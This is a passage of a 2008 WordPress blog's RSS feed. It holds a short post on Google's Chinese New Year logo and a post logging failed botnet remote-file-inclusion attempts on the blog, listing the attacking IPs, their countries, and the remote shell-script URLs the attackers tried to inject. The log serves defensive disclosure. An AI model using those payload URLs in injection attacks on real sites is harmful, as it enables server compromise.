<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Google Celebrate Chinese New Year with New Festival Logo</title>
		<link>http://42.kaizeku.com/ranting/google-celebrate-chinese-new-year-with-new-festival-logo/</link>
		<comments>http://42.kaizeku.com/ranting/google-celebrate-chinese-new-year-with-new-festival-logo/#comments</comments>
		<pubDate>Wed, 06 Feb 2008 13:39:51 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Google]]></category>

		<category><![CDATA[ranting]]></category>

		<category><![CDATA[cny]]></category>

		<category><![CDATA[logo]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/ranting/google-celebrate-chinese-new-year-with-new-festival-logo/</guid>
		<description><![CDATA[Google Celebrate Chinese New Year with New Festival Logo Happy Chinese new year]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/lunarnewyear08res.gif' alt='lunarnewyear08res.gif' class="fl" /></p>
<p class="cb">According to <a href="http://en.wikipedia.org/wiki/Chinese_New_Year" class="exturl icn-r">Chinese Lunar Calendar</a> 2008 is the year of the RAT. ~Mickey 8:&gt;</p>
<p><span id="more-191"></span></p>
<h2>External Links</h2>
<ul class="xoxo">
<li><a href="http://www.google.com/holidaylogos99.html">Collections of Google Holiday Logos 1999 - 2007</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/ranting/google-celebrate-chinese-new-year-with-new-festival-logo/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 12:13:27 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</guid>
		<description><![CDATA[

 I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful &#8595;.

Failed Hacking Attempts
Sort by Injection type.



IP / DDNS
UA
ATT
Country
Params




85.25.10.30
N/A
2
Germany


http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt
Request URI: /security/injection/




]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these <a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Botnet</a> (Bot-herder) will be published in this post. Somebody might find the informations useful &darr;.<br />
<span id="more-178"></span></p>
<h2>Failed Hacking Attempts</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.25.10.30" class="exturl icn-r" rel="nofollow">85.25.10.30</a></small></td>
<td>N/A</td>
<td>2</td>
<td><small><a href="http://api.hostip.info/?ip=85.25.10.30" class="exturl icn-r" rel="nofollow">Germany</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt</small></li>
<li><small>Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=200.226.246.22class="exturl icn-r" rel="nofollow">200.226.246.22</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=200.226.246.22" class="exturl icn-r" rel="nofollow">Brazil</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=203.151.233.24" class="exturl icn-r" rel="nofollow">203.151.233.24</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=203.151.233.24" class="exturl icn-r" rel="nofollow">Thailand</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=69.10.135.176" class="exturl icn-r" rel="nofollow">69.10.135.176</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=69.10.135.176" class="exturl icn-r" rel="nofollow">Canada</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://chmod.altervista.org/modalita/cmd2.txt</small></li>
<li><small> Request URI: <a href="/security/vulnerability/fixes-statscounter-updatesh-vulnerability/">/fixes-statscounter-updatesh-vulnerability/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
